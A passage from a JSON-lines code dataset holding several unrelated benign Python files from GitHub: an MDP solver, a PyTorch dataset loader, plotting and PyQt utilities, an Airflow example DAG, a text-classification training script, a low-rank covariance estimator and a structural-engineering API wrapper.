ONLY *THREE SPACES* DELIMITER. \n #list is currently [action0 [state0 ... stateN] , ... , actionN [state0 ... 
stateN] ]\n fd.readline()\n rewards = [float(x) for x in fd.readline().rstrip('\\n').rsplit(' ')]\n #swizzel\n states = []\n for i in range(0, numStates):\n stateProb = [ x[i] for x in tmp ]\n states.append( stateProb)\n\n\n m = Markov(states, rewards)\n return m\n\n#unicode characters <3\ndef δ(beta):\n epsilon = 10**-10\n numerator = epsilon*((1-beta)**2)\n denominator = 2 * (beta**2)\n return numerator / denominator\n\n\n\ndef main():\n cmdArgs()\n β = float(sys.argv[2])\n delta = δ(β)\n\n f = open(sys.argv[1], 'r')\n (statCnt, actCnt) = [ int(x) for x in f.readline().rstrip('\\n').rsplit(' ') ]\n\n markov = getMark(statCnt,actCnt, f)\n markov.Bellman( β, delta)\n markov.displayOutput()\n\n f.close()\n return;\n\n\n\nmain()\n\n","repo_name":"markuswoltjer/CS434","sub_path":"HW5/hw5.py","file_name":"hw5.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39812987875","text":"import cv2\nfrom torch.utils import data\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nimport os\nfrom transforms import Transforms\nimport glob\nfrom torchvision.transforms import functional\nimport pandas as pd\nimport json\n\nclass Dataset(data.Dataset):\n def __init__(self, dataset, increntmal_phase,exemplar_set,exemplar_set_gt):\n self.dataset = dataset\n self.label_list=[]\n self.image_list=[]\n self.target=[]\n train_stage=['part_A_final','jujubes','cherrys','tulips','chickens','vehicles']\n test_stage={\n 0: ['part_A_final'],\n 1: ['jujubes','part_A_final'],\n 2: ['cherrys', 'part_A_final','jujubes'],\n 3: ['tulips', 'part_A_final', 'jujubes','cherrys'],\n 4: ['chickens', 'part_A_final', 'jujubes', 'cherrys','tulips'],\n 5: ['vehicles', 'part_A_final', 'jujubes', 'cherrys', 'tulips', 'chickens'],\n }\n self.class_name=['others','IMG','jujube','cherry','tulip','chicken','vehicle']\n\n dataset = dataset + '_data'\n if increntmal_phase==0:\n dataset_path = os.path.join('./dataset',train_stage[increntmal_phase],dataset,'images')\n self.image_list = glob.glob(os.path.join(dataset_path, '*.jpg'))\n for index in range(len(self.image_list)):\n image = self.image_list[index]\n image_name=image.split('images/')[1]\n if image_name.startswith('IMG'):\n self.label_list.append(self.image_list[index].replace('.jpg', '.csv').replace('images', 'ground_truth'))\n if self.dataset=='train':\n self.target.append(1)\n else:\n img = cv2.imread(image)\n height = img.shape[0]\n width = img.shape[1]\n label=np.zeros((height,width))\n self.label_list.append(label)\n self.target.append(0)\n\n elif increntmal_phase>=1:\n if self.dataset=='test' or self.dataset=='val':\n for phase in range(len(test_stage[increntmal_phase])):\n dataset_path=os.path.join('./dataset',test_stage[increntmal_phase][phase],dataset,'images')\n img_list_buff=glob.glob(os.path.join(dataset_path,'*.jpg'))\n for index in range(len(img_list_buff)):\n self.image_list.append(img_list_buff[index])\n self.label_list.append(img_list_buff[index].replace('.jpg', '.csv').replace('images', 'ground_truth'))\n # image_name = img_list_buff[index].split('images/')[1]\n # image_name = image_name.split('_')[0]\n # if image_name in self.class_name:\n # self.target.append(self.class_name.index(image_name))\n # else:\n # print('error!')\n\n elif self.dataset=='train':\n dataset_path = os.path.join('./dataset',train_stage[increntmal_phase], dataset, 'images')\n img_list_buff = glob.glob(os.path.join(dataset_path, '*.jpg'))\n for index in 
range(len(img_list_buff)):\n self.image_list.append(img_list_buff[index])\n self.label_list.append(img_list_buff[index].replace('.jpg', '.csv').replace('images', 'ground_truth'))\n image_name = img_list_buff[index].split('images/')[1]\n image_name = image_name.split('_')[0]\n if image_name in self.class_name:\n self.target.append(self.class_name.index(image_name))\n else:\n print('error!')\n\n if exemplar_set!=None:\n for index in range(len(exemplar_set)):\n for num in range(len(exemplar_set[index])):\n self.image_list.append(exemplar_set[index][num])\n self.label_list.append(exemplar_set_gt[index][num])\n image_name = exemplar_set[index][num].split('images/')[1]\n image_name = image_name.split('_')[0]\n if image_name in self.class_name:\n self.target.append(self.class_name.index(image_name))\n else:\n self.target.append(0)\n\n def __getitem__(self, index):\n #class_name = ['others', 'IMG', 'jujube', 'cherry']\n image = Image.open(self.image_list[index]).convert('RGB')\n # target = self.target[index]\n if self.dataset == 'train':\n target = self.target[index]\n img=self.image_list[index].split('images/')[1]\n img = img.split('_')[0]\n #if img.startswith('IMG') or img.startswith('jujube') or img.startswith('cherry'):\n if img in self.class_name:\n label = pd.read_csv((self.label_list[index]), sep=',',header=None).values\n else:\n label = self.label_list[index]\n else:\n label = pd.read_csv((self.label_list[index]), sep=',',header=None).values\n\n density = np.asarray(label,np.float32)\n attention = np.zeros(density.shape)\n attention[density > 0.0001] = 1\n attention = attention.astype(np.float32, copy=False)\n gt = np.array(np.sum(np.sum(density)))\n\n trans = Transforms((0.8, 1.2), (400, 400), 1, (0.5, 1.5), self.dataset)\n if self.dataset=='train':\n image, density, attention = trans(image, density,attention)\n return image, density, target, attention\n\n else:\n height, width = image.size[1], image.size[0]\n height = round(height / 16) * 16\n width = round(width / 16) * 16\n image = image.resize((width, height), Image.BILINEAR)\n\n image = functional.to_tensor(image)\n image = functional.normalize(image, [0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n return image, gt\n\n def __len__(self):\n return len(self.image_list)\n\n\n# if __name__ == '__main__':\n# train_dataset = Dataset1('/home/shengqin/wq/incremental_learning/iCaRL-master(modify)/dataset', 'train')\n# train_loader = data.DataLoader(train_dataset, batch_size=1, shuffle=True)\n#\n# for image, label, att in train_loader:\n# print(image.size())\n# print(label.size())\n# print(att.size())\n#\n# img = np.transpose(image.numpy().squeeze(), [1, 2, 0]) * 0.2 + 0.45\n# plt.figure()\n# plt.subplot(1, 3, 1)\n# plt.imshow(img)\n# plt.subplot(1, 3, 2)\n# plt.imshow(label.squeeze(), cmap='jet')\n# plt.subplot(1, 3, 3)\n# plt.imshow(att.squeeze(), cmap='jet')\n# plt.show()\n#","repo_name":"Tanyjiang/EOCO","sub_path":"Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":6892,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"18076695733","text":"# importing the required module \nimport matplotlib.pyplot as plt\n\ndef process_file(fp):\n\tx_values = []\n\ty_values = []\n\tlines = fp.readlines()\n\tfor line in lines:\n\t\tline = line.strip()\n\t\tobj = line.split(' - ')\n\t\tif not obj[0].isdigit():\n\t\t\tcontinue\n\t\tx_values.append(int(obj[0]) * 3)\n\t\ty_values.append(int(obj[1]))\n\n\treturn x_values, y_values\n\n \ndef main():\n\tfp1 = 
open('LockBasedResults.txt', 'r')\n\tfp2 = open('LockFreeResults.txt', 'r')\n\n\tg1_x, g1_y = process_file(fp1)\n\tg2_x, g2_y = process_file(fp2)\n\t\n\t# plotting the LockBasedResults Graph\n\tplt.plot(g1_x, g1_y, label = 'Lock Based')\n\n\t# plotting the LockFreeResults Graph\n\tplt.plot(g2_x, g2_y, label = 'Lock Free')\n\t \n\t# naming the x axis \n\tplt.xlabel('Num of Ops') \n\t# naming the y axis \n\tplt.ylabel('Time (ms)') \n\t \n\t# giving a title to my graph \n\tplt.title('Comparison of Throughput') \n\n\t# Showing the legend\n\tplt.legend(loc='upper left')\n\t \n\t# function to show the plot \n\tplt.show()\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"Bhargavasomu/Concurrent-Binary-Search-Tree","sub_path":"graph_gen.py","file_name":"graph_gen.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23905659348","text":"from __future__ import unicode_literals\n\nfrom PyQt5.QtCore import pyqtSlot, Qt, QSortFilterProxyModel, QStringListModel\nfrom PyQt5.QtWidgets import QDialog, QInputDialog, QLineEdit\n\nfrom .Ui_E5ErrorMessageFilterDialog import Ui_E5ErrorMessageFilterDialog\n\n\nclass E5ErrorMessageFilterDialog(QDialog, Ui_E5ErrorMessageFilterDialog):\n \"\"\"\n Class implementing a dialog to manage the list of messages to be ignored.\n \"\"\"\n def __init__(self, messageFilters, parent=None):\n \"\"\"\n Constructor\n \n @param messageFilters list of message filters to be edited\n (list of strings)\n @param parent reference to the parent widget (QWidget)\n \"\"\"\n super(E5ErrorMessageFilterDialog, self).__init__(parent)\n self.setupUi(self)\n \n self.__model = QStringListModel(messageFilters, self)\n self.__model.sort(0)\n self.__proxyModel = QSortFilterProxyModel(self)\n self.__proxyModel.setFilterCaseSensitivity(Qt.CaseInsensitive)\n self.__proxyModel.setSourceModel(self.__model)\n self.filterList.setModel(self.__proxyModel)\n \n self.searchEdit.textChanged.connect(\n self.__proxyModel.setFilterFixedString)\n \n self.removeButton.clicked.connect(self.filterList.removeSelected)\n self.removeAllButton.clicked.connect(self.filterList.removeAll)\n \n @pyqtSlot()\n def on_addButton_clicked(self):\n \"\"\"\n Private slot to add an entry to the list.\n \"\"\"\n filter, ok = QInputDialog.getText(\n self,\n self.tr(\"Error Messages Filter\"),\n self.tr(\"Enter message filter to add to the list:\"),\n QLineEdit.Normal)\n if ok and filter != \"\" and filter not in self.__model.stringList():\n self.__model.insertRow(self.__model.rowCount())\n self.__model.setData(\n self.__model.index(self.__model.rowCount() - 1), filter)\n self.__model.sort(0)\n \n def getFilters(self):\n \"\"\"\n Public method to get the list of message filters.\n \n @return error message filters (list of strings)\n \"\"\"\n return self.__model.stringList()[:]\n","repo_name":"testmana2/eric","sub_path":"E5Gui/E5ErrorMessageFilterDialog.py","file_name":"E5ErrorMessageFilterDialog.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"40911487037","text":"from src.sizing.BodyMeasurements import BodyMeasurements\n\n# Measurements for Velvet Caveat\n\nvelvet_caveat = BodyMeasurements(\n chest=400,\n bust=950,\n front_shoulder_to_waist=480,\n waist=790,\n neck_size=390,\n nape_to_waist=450,\n bust_to_waist=240,\n under_bust=87,\n shoulders=480,\n)\n\nprint(velvet_caveat)\n\n\n# More measurements from 23.01.2023\n# Neck to 
shoulder: 7”/18cm\n# Bust: 39”/99cm\n# Chest: 14”/36.5cm\n# Nape to waist: 17”/44cm\n# Back: 14.5”/37.5cm\n","repo_name":"joelle-o-world/pattern-cutting","sub_path":"velvet-caveat.py","file_name":"velvet-caveat.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14983744492","text":"from airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom datetime import datetime, timedelta\n\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime(2017, 8, 31),\n 'email': ['airflow@airflow.com'],\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n}\n\ndag = DAG('airflow-docker-example', default_args=default_args)\n\nt1 = BashOperator(\n task_id='print_date',\n bash_command='date',\n dag=dag)\n\nt2 = BashOperator(\n task_id='hello_world',\n bash_command='echo Hello World',\n dag=dag)\n\nt2.set_upstream(t1)\n","repo_name":"Shinichi-Nakagawa/airflow-docker","sub_path":"airflow_dag_sample/hello_airflow.py","file_name":"hello_airflow.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"3"} +{"seq_id":"39116853532","text":"\"\"\"\nmain.py\n\nThis is where model training is done. Note that train_model() in utilities.py is where our main\ntraining function is defined.\n\"\"\"\nfrom unicodedata import category\nimport torch\nimport pickle\n\nfrom utilities import train_model, get_param_sizes, generate_hyperparameters, \\\n find_best_parameters, find_correct_classifications\nfrom model import DBPedia, HierarchicalRNN, BaselineMLP\n\n\nif __name__ == \"__main__\":\n file_fmt = \"processed_data/DBPEDIA_{split}_{var}.pt\"\n small_file_fmt = \"processed_data/DBPEDIA_{split}_small_{var}.pt\"\n l2_l1_file_fmt = \"processed_data/DBPEDIA_l2_l1_Agent_{var}.pt\"\n\n # how much data to load\n train_obs = 40000\n val_obs = 36003\n test_obs = 60794\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n print(\"Using device {}\".format(device))\n\n # Uncomment train based on what training set you want to use\n\n # train = DBPedia(small_file_fmt.format(split=\"train\", var=\"embeddings\", category=\"l2\"),\n # small_file_fmt.format(split=\"train\", var=\"labels\", category=\"l2\"),\n # obs=train_obs)\n\n # train = DBPedia(l2_l1_file_fmt.format(var=\"embeddings\"),\n # l2_l1_file_fmt.format(var=\"labels\"),\n # obs=train_obs)\n\n train = DBPedia(file_fmt.format(split=\"train\", var=\"embeddings\"),\n file_fmt.format(split=\"train\", var=\"labels\"),\n obs=train_obs)\n val = DBPedia(file_fmt.format(split=\"val\", var=\"embeddings\"),\n file_fmt.format(split=\"val\", var=\"labels\"),\n obs=val_obs)\n test = DBPedia(file_fmt.format(split=\"test\", var=\"embeddings\"),\n file_fmt.format(split=\"test\", var=\"labels\"),\n obs=test_obs)\n\n # uncomment model to use\n\n model = HierarchicalRNN(\n input_size=768, emb_size=100, output_sizes=(9, 70, 219)\n ).to(device)\n\n # model = BaselineMLP(\n # input_size=768, output_sizes=(9, 70, 219)\n # ).to(device)\n\n '''\n Model Checkpointing Notes\n \n For checkpointing/saving a model, set checkpoint_path to the directory for \n model checkpoint to be saved i.e. \"./checkpoint/\".\n\n To load a checkpointed model and train on it set: load_checkpoint: True and \n load_checkpoint_path = ex. 
\"./checkpoint/model_233939_0\"\n\n You can also set the checkpoint frequency by setting checkpoint_frequency = \n By default it is set to 4 epochs.\n\n Model checkpoints will be saved in a directory within your checkpoint path\n '''\n train_opts = {\n \"calc_acc_every\": 4,\n \"num_epochs\": 100,\n \"checkpoint_path\": './checkpoints/',\n # \"load_checkpoint\": True,\n # \"load_checkpoint_path\": './checkpoints/18-04-2022 11:19:48/model_18-04-2022 11:19:48_20',\n \"optimizer\": \"adam\",\n \"tf_init\": 0,\n \"tf_decay\": 0.5\n }\n\n # param_sizes = get_param_sizes(model)\n\n '''\n Toggle save_imgs to True to save imgs to an imgs directory which will be created if it doesn't exist: imgs/\n '''\n # hp = find_best_parameters(20, model, train, val, test, device)\n ho = {'calc_acc_every': 4, 'batch_size': 64, 'learning_rate': 0.001020977066089074,\n 'weight_decay': 0.000, 'momentum': 0.000, 'num_epochs': 14}\n train_opts.update(ho)\n\n # train_model(model, train, val, test,\n # device=device, train_opts=train_opts, show_plts=False, save_imgs=False)\n\n # needed to load pickle file.\n\n # from data_cleaning import WordIdMapping\n # options = {\n # 'load_checkpoint': True,\n # 'load_checkpoint_path': \"./checkpoints/18-04-2022 16:20:40/model_18-04-2022 16:20:40_14\"\n # }\n # data_mapping = pickle.load(open('./processed_data/mapping.pkl', 'rb'))\n # res = find_correct_classifications(model, opts=options, device=device, word_mapping=data_mapping)\n # print(res)\n","repo_name":"keithallatt/HierarchicalMultiLabelClassification","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"8331775308","text":"from __future__ import annotations\n\nfrom collections import namedtuple\nfrom typing import Union\n\nimport numpy as np\nimport pandas as pd\nfrom pandas._typing import TimedeltaConvertibleTypes\nfrom scipy.sparse.linalg import eigsh\nfrom scipy.sparse.linalg import LinearOperator\n\nfrom cvx.covariance.ewma import center\nfrom cvx.covariance.ewma import clip\nfrom cvx.covariance.ewma import volatility\n\nLowRankCovariance = namedtuple(\"LowRankCovariance\", [\"F\", \"d\"])\nIEWMA = namedtuple(\"IEWMA\", [\"time\", \"mean\", \"covariance\", \"volatility\"])\n\n\ndef _get_diagonal(F, d):\n return np.sum(F**2, axis=1) + d\n\n\ndef low_rank_iterated_ewma(\n returns,\n vola_halflife,\n cov_halflife,\n rank,\n min_periods_vola=20,\n min_periods_cov=20,\n mean=False,\n mu_halflife1=None,\n mu_halflife2=None,\n clip_at=None,\n):\n mu_halflife1 = mu_halflife1 or vola_halflife\n mu_halflife2 = mu_halflife2 or cov_halflife\n\n def scale_low_rank(vola, low_rank):\n F_temp = low_rank.F\n d_temp = low_rank.d\n\n index = F_temp.index\n columns = F_temp.columns\n F_temp = F_temp.values\n d_temp = d_temp.values\n\n # Convert (covariance) matrix to correlation matrix\n v = 1 / np.sqrt(_get_diagonal(F_temp, d_temp).reshape(-1, 1))\n F = v * F_temp\n d = (v.flatten() ** 2) * d_temp\n\n F = vola.reshape(-1, 1) * F\n d = (vola**2) * d\n\n return LowRankCovariance(\n F=pd.DataFrame(F, index=index, columns=columns), d=pd.Series(d, index=index)\n )\n\n def scale_mean(vola, vec1, vec2):\n return vec1 + vola * vec2\n\n # compute the moving mean of the returns\n\n # TODO: Check if this is correct half life\n returns, returns_mean = center(\n returns=returns, halflife=mu_halflife1, min_periods=0, mean_adj=mean\n )\n\n # estimate the volatility, clip some returns before they enter the 
estimation\n vola = volatility(\n returns=returns,\n halflife=vola_halflife,\n min_periods=min_periods_vola,\n clip_at=clip_at,\n )\n\n # adj the returns\n adj = clip((returns / vola), clip_at=clip_at)\n\n # center the adj returns again? Yes, I think so\n # TODO: Check if this is correct half life\n\n adj, adj_mean = center(adj, halflife=mu_halflife2, min_periods=0, mean_adj=mean)\n # if mean:\n # print(adj)\n # print(adj_mean)\n # assert False\n\n m = pd.Series(np.zeros_like(returns.shape[1]), index=returns.columns)\n\n for t, low_rank in _ewma_low_rank(\n data=adj, halflife=cov_halflife, min_periods=min_periods_cov, rank=rank\n ):\n if mean:\n m = scale_mean(\n vola=vola.loc[t].values, vec1=returns_mean.loc[t], vec2=adj_mean.loc[t]\n )\n\n yield IEWMA(\n time=t,\n mean=m,\n covariance=scale_low_rank(vola=vola.loc[t].values, low_rank=low_rank),\n volatility=vola.loc[t],\n )\n\n\ndef _ewma_low_rank(data, halflife, min_periods=0, rank=5):\n \"\"\"\n param data: Txn pandas DataFrame of returns\n param halflife: float, halflife of the EWMA\n \"\"\"\n for t, low_rank_covariance in _general_low_rank(\n data.values,\n times=data.index,\n halflife=halflife,\n min_periods=min_periods,\n rank=rank,\n ):\n F_t = low_rank_covariance.F\n d_t = low_rank_covariance.d\n if not np.isnan(F_t).all():\n yield t, LowRankCovariance(\n pd.DataFrame(\n index=data.columns, columns=np.arange(F_t.shape[1]), data=F_t\n ),\n pd.Series(index=data.columns, data=d_t),\n )\n\n\ndef _low_rank_sum(F, d, r):\n r\"\"\"\n D = diag(d)\n\n Approximates sum FF^T + D + rr^T as low rank plus diagonal matrix:\n \\hat{F}\\hat{F}^T + \\hat{D}\n\n returns \\hat{F}, diag(\\hat{D})\n \"\"\"\n n = F.shape[0]\n rank = F.shape[1]\n r = r.reshape(-1, 1)\n d = d.reshape(-1, 1)\n\n def _mv(x):\n \"\"\" \"\n returns (FF^T + D + rr^T)x\n \"\"\"\n shape = x.shape\n x = x.reshape(-1, 1)\n\n return (\n ((scale * F) @ ((F.T * scale.T) @ x)) + (scale * r) * (r.T * scale.T) @ x\n ).reshape(shape)\n\n def _get_new_diag(F_hat):\n r\"\"\"\n returns diag(\\hat{D})\n \"\"\"\n\n return (\n np.ones((n, 1))\n + d * (scale**2)\n - np.sum(F_hat**2, axis=1).reshape(-1, 1)\n )\n\n # Get scaling toward correlation matrix\n scale = 1 / np.sqrt(np.sum(F**2, axis=1).reshape(-1, 1) + r**2)\n\n A = LinearOperator((n, n), matvec=_mv)\n\n # Compute top eigenvalues\n lamda, Q = eigsh(A, k=rank, which=\"LM\")\n\n # Replace negative lamda with 0\n lamda[lamda < 0] = 0\n\n # Get new low rank component (unscaled)\n F_hat_temp = Q * np.sqrt(lamda).reshape(1, -1)\n\n # Get new diagonal\n d_hat = 1 / (scale) * _get_new_diag(F_hat_temp) * 1 / (scale)\n\n # Scale back low rank component\n F_hat = (1 / scale) * F_hat_temp\n\n # Replace negative d_hat with 0\n d_hat[d_hat < 0] = 0\n\n return LowRankCovariance(F_hat, d_hat.flatten())\n\n\ndef _general_low_rank(\n y,\n times,\n halflife: float | TimedeltaConvertibleTypes | None = None,\n alpha: float | None = None,\n rank=5,\n min_periods=0,\n):\n \"\"\"\n y: frame with measurements for times t=t_1,t_2,...,T\n halflife: EWMA half life\n\n returns: list of EWMAs for times t=t_1,t_2,...,T\n serving as predictions for the following timestamp\n\n The function returns a generator over\n t_i, EWMA of fct(y_i)\n \"\"\"\n n = y.shape[1]\n\n def f(k):\n if k < min_periods - 1:\n return times[k], LowRankCovariance(\n np.nan * _low_rank.F, np.nan * _low_rank.d\n )\n\n return times[k], LowRankCovariance(_low_rank.F, _low_rank.d)\n\n if halflife:\n alpha = 1 - np.exp(-np.log(2) / halflife)\n\n beta = 1 - alpha\n\n # first row, important to 
initialize the _ewma variable\n F_init = np.zeros((n, rank))\n F_init[:, 0] = y[0]\n d_init = np.zeros(n)\n _low_rank = LowRankCovariance(F_init, d_init)\n yield f(k=0)\n\n # iterate through all the remaining rows of y. Start in the 2nd row\n for n, row in enumerate(y[1:], start=1):\n coef_old = (beta - beta ** (n + 1)) / (1 - beta ** (n + 1))\n coef_new = (1 - beta) / (1 - beta ** (n + 1))\n\n F_scaled = _low_rank.F * np.sqrt(coef_old)\n d_scaled = _low_rank.d * coef_old\n r_scaled = row * np.sqrt(coef_new)\n\n _low_rank = _low_rank_sum(F_scaled, d_scaled, r_scaled)\n\n yield f(k=n)\n","repo_name":"cvxgrp/cov_pred_finance","sub_path":"experiments/utils/low_rank_ewma.py","file_name":"low_rank_ewma.py","file_ext":"py","file_size_in_byte":6564,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"3"} +{"seq_id":"34202839635","text":"from typing import Union\nfrom ram_concept.model import Model\nfrom ram_concept.structure_layer import StructureLayer\nfrom ram_concept.point_2D import Point2D\nfrom ram_concept.line_segment_2D import LineSegment2D\nfrom ram_concept.polygon_2D import Polygon2D\nfrom ram_concept.slab_area import SlabAreaBehavior\nfrom ram_concept.beam import BeamBehavior\n\n\ndef add_slab_area(model: Model, polygon: Polygon2D, name: Union[str, None], thickness: Union[float, None],\n top_of_concrete: Union[float, None], priority: Union[int, None], behaviour: Union[str, None],\n material: Union[str, None], axis_angle: Union[float, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add slab area\n slab_area = structure_layer.add_slab_area(polygon)\n # set properties of slab area\n if name is not None:\n slab_area.name = name\n if thickness is not None:\n slab_area.thickness = thickness\n if top_of_concrete is not None:\n slab_area.toc = top_of_concrete\n if priority is not None:\n slab_area.priority = priority\n if behaviour is not None:\n slab_area.behavior = SlabAreaBehavior(behaviour)\n if material is not None:\n slab_area.concrete = model.concretes.concrete(material)\n if axis_angle is not None:\n slab_area.r_axis = axis_angle\n # TODO add stiffness modifiers for custom slab areas\n\n\ndef add_slab_opening(model: Model, polygon: Polygon2D, name: Union[str, None], priority: Union[int, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add slab opening\n slab_opening = structure_layer.add_slab_opening(polygon)\n # set properties of slab opening\n if name is not None:\n slab_opening.name = name\n if priority is not None:\n slab_opening.priority = priority\n\n\ndef add_column(model: Model, location: Point2D, name: Union[str, None], below_slab: Union[bool, None],\n height: Union[float, None], compressible: Union[bool, None], fixed_near: Union[bool, None],\n fixed_far: Union[bool, None], roller: Union[bool, None], material: Union[str, None],\n i_factor: Union[float, None], depth: Union[float, None], breadth: Union[float, None],\n angle: Union[float, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add column\n column = structure_layer.add_column(location)\n # set properties of column\n if name is not None:\n column.name = name\n if below_slab is not None:\n column.below_slab = below_slab\n if height is not None:\n column.height = height\n if compressible is not None:\n column.compressible = compressible\n if fixed_near is not None:\n column.fixed_near = fixed_near\n if fixed_far is not None:\n column.fixed_far 
= fixed_far\n if roller is not None:\n column.roller = roller\n if material is not None:\n column.concrete = model.concretes.concrete(material)\n if i_factor is not None:\n column.i_factor = i_factor\n if depth is not None:\n column.d = depth\n if breadth is not None:\n column.b = breadth\n if angle is not None:\n column.angle = angle\n\n\ndef add_wall(model: Model, line_segments: list[LineSegment2D], name: Union[str, None], below_slab: Union[bool, None],\n height: Union[float, None], compressible: Union[bool, None], fixed_near: Union[bool, None],\n fixed_far: Union[bool, None], shear_wall: Union[bool, None], material: Union[str, None],\n thickness: Union[float, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add wall segments\n for segment in line_segments:\n wall = structure_layer.add_wall(segment)\n # set properties of wall\n if name is not None:\n wall.name = name\n if below_slab is not None:\n wall.below_slab = below_slab\n if height is not None:\n wall.height = height\n if compressible is not None:\n wall.compressible = compressible\n if fixed_near is not None:\n wall.fixed_near = fixed_near\n if fixed_far is not None:\n wall.fixed_far = fixed_far\n if shear_wall is not None:\n wall.shear_wall = shear_wall\n if material is not None:\n wall.concrete = model.concretes.concrete(material)\n if thickness is not None:\n wall.thickness = thickness\n\n\ndef add_beam(model: Model, line_segments: list[LineSegment2D], name: Union[str, None], thickness: Union[float, None],\n width: Union[float, None], top_of_concrete: Union[float, None], priority: Union[int, None],\n behaviour: Union[str, None], material: Union[str, None], mesh_as_slab: Union[bool, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add beam segments\n for segment in line_segments:\n beam = structure_layer.add_beam(segment)\n # set properties of beam\n if name is not None:\n beam.name = name\n if thickness is not None:\n beam.thickness = thickness\n if width is not None:\n beam.width = width\n if top_of_concrete is not None:\n beam.toc = top_of_concrete\n if priority is not None:\n beam.priority = priority\n if behaviour is not None:\n beam.behavior = BeamBehavior(behaviour)\n if material is not None:\n beam.concrete = model.concretes.concrete(material)\n if mesh_as_slab is not None:\n beam.mesh_as_slab = mesh_as_slab\n # TODO add stiffness modifiers for custom beams\n\n\ndef add_point_support(model: Model, location: Point2D, name: Union[str, None], elevation: Union[float, None],\n Fr: Union[bool, None], Fs: Union[bool, None], Fz: Union[bool, None],\n Mr: Union[bool, None], Ms: Union[bool, None], angle: Union[float, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add point support\n support = structure_layer.add_point_support(location)\n # set properties of point support\n if name is not None:\n support.name = name\n if elevation is not None:\n support.elevation = elevation\n if Fr is not None:\n support.Fr = Fr\n if Fs is not None:\n support.Fs = Fs\n if Fz is not None:\n support.Fz = Fz\n if Mr is not None:\n support.Mr = Mr\n if Ms is not None:\n support.Ms = Ms\n if angle is not None:\n support.angle = angle\n\n\ndef add_point_spring(model: Model, location: Point2D, name: Union[str, None], elevation: Union[float, None],\n kFr: Union[float, None], kFs: Union[float, None], kFz: Union[float, None],\n kMr: Union[float, None], kMs: Union[float, None], angle: Union[float, None]):\n # cad 
layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add point spring\n spring = structure_layer.add_point_spring(location)\n # set properties of point spring\n if name is not None:\n spring.name = name\n if elevation is not None:\n spring.elevation = elevation\n if kFr is not None:\n spring.kFr = kFr\n if kFs is not None:\n spring.kFs = kFs\n if kFz is not None:\n spring.kFz = kFz\n if kMr is not None:\n spring.kMr = kMr\n if kMs is not None:\n spring.kMs = kMs\n if angle is not None:\n spring.angle = angle\n\n\ndef add_line_support(model: Model, line_segments: list[LineSegment2D], name: Union[str, None],\n elevation: Union[float, None],\n Fr: Union[bool, None], Fs: Union[bool, None], Fz: Union[bool, None],\n Mr: Union[bool, None], Ms: Union[bool, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add line segments support\n for segment in line_segments:\n line_support = structure_layer.add_line_support(segment)\n # set properties of point support\n if name is not None:\n line_support.name = name\n if elevation is not None:\n line_support.elevation = elevation\n if Fr is not None:\n line_support.Fr = Fr\n if Fs is not None:\n line_support.Fs = Fs\n if Fz is not None:\n line_support.Fz = Fz\n if Mr is not None:\n line_support.Mr = Mr\n if Ms is not None:\n line_support.Ms = Ms\n\n\ndef add_line_spring(model: Model, line_segments: list[LineSegment2D], name: Union[str, None],\n elevation: Union[float, None],\n kFr0: Union[float, None], kFs0: Union[float, None], kFz0: Union[float, None],\n kMr0: Union[float, None], kMs0: Union[float, None],\n kFr1: Union[float, None], kFs1: Union[float, None], kFz1: Union[float, None],\n kMr1: Union[float, None], kMs1: Union[float, None],\n angle: Union[float, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add line segments spring\n for segment in line_segments:\n line_spring = structure_layer.add_line_spring(segment)\n # set properties of point support\n if name is not None:\n line_spring.name = name\n if elevation is not None:\n line_spring.elevation = elevation\n if angle is not None:\n line_spring.angle = angle\n # start point stiffness values\n if kFr0 is not None:\n line_spring.kFr0 = kFr0\n if kFs0 is not None:\n line_spring.kFs0 = kFs0\n if kFz0 is not None:\n line_spring.kFz0 = kFz0\n if kMr0 is not None:\n line_spring.kMr0 = kMr0\n if kMs0 is not None:\n line_spring.kMs0 = kMs0\n # end point stiffness values\n if kFr1 is not None:\n line_spring.kFr1 = kFr1\n if kFs1 is not None:\n line_spring.kFs1 = kFs1\n if kFz1 is not None:\n line_spring.kFz1 = kFz1\n if kMr1 is not None:\n line_spring.kMr1 = kMr1\n if kMs1 is not None:\n line_spring.kMs1 = kMs1\n\n\ndef add_area_spring(model: Model, polygon: Polygon2D, name: Union[str, None], elevation: Union[float, None],\n kFr0: Union[float, None], kFs0: Union[float, None], kFz0: Union[float, None],\n kMr0: Union[float, None], 